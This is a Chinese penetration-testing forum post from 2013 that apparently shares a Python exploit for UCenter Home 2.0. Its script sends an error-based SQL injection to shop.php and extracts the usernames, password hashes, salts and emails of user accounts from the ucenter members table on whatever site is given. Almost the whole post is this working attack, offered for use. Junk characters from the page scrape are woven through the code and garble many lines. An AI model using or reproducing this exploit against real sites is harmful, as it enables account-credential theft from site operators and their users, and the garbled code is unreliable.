找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2436|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl0 f) o: _; G- Q9 n( z* _

8 @- _) P: R3 P3 x3 f: G- \- @' w5 }) R; K; E/ M
#!/usr/bin/env python  
6 n  L) ]5 g: s/ }
& a) E/ X3 K9 G% S: _# Aimport sys  # j& {( v" \8 H' p- `8 [
import urllib2  
* z7 @$ X1 N. {* i  T1 C  simport re  
( K# w3 W# {$ H$ y1 G
% D( r9 w1 n7 h$ r+ Pdef info():  
1 y2 b1 O$ t1 D5 T! I1 Y% a    print 'From:http://www.exploit-db.com/exploits/14997/' 8 }3 n+ k( q) y
    print 'http://www.hake.cc/Web_loudong/' ) X* l: R" q1 U# J3 E0 n  r2 l' ?
    print 'changed:qiaoy'  
3 M/ q5 t+ o  C5 N) g5 p    print 'exp:'  & v- X, a) {, B& B' d
    print ' ./UCenter_Home_2.0.py site'  0 i% M4 z# }1 Y

- L5 O- c7 Z5 u) C4 Bdef main():  
$ n: G$ I4 Z+ R    if len(sys.argv) != 2:  # W+ X) z! U" K6 V
        info()  
* E" S. Q% e* B2 \" }  X$ A2 z    else:  ! _  z0 Q% V: X2 \. }
        site = sys.argv[1]  3 _; a* d4 n/ w2 F& f( h2 y
        if site[0:7] == 'http://':  0 f, W5 G. Y9 Z. L; G
            sitesite =site  # b/ d0 v$ I* K. G3 @5 h# e$ ^
        elif site[0:8] == 'https://':  ) }6 t' w1 z, d
            sitesite = site  4 J# G8 ^  }7 J$ n9 Z/ J" M
        else:  1 S: _, x$ x' n; }- t8 }
            site = 'http://'+site  3 s$ c9 Z# E1 X0 U
        try:  & m, I4 h+ p+ m4 C0 D
            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
, p. ]$ x$ i) g  _5 _+ }6 A            Value = urllib2.urlopen(url).read()  
7 ~" q! [  l6 d0 W4 N            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  8 O/ I& _* C3 @* K) ~
            hacked = Msg.split(':')  6 @* P5 ?+ i# m: d- i7 e
            print 'Name:    '+hacked[1]  3 Z8 d+ h1 L7 ]( O
            print 'Passwd:  '+hacked[2]  
6 a$ S  _( C$ G! K' v: Y3 `- a/ g            print 'salt:    '+hacked[3]  
6 W8 e6 S3 n; V* Z: b0 K2 R6 Q            print 'email:   '+hacked[4]  
5 E: ^! L  E" a7 c6 z: w' R        except:  + X9 n8 m# ^/ ^
            print 'Sorry,I can\'t work............'  : Z# H/ n% Y$ S1 a( U
% S1 t$ G( K& |  {' s' f- {
if __name__ == '__main__':  3 j$ C% y; y6 b
    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表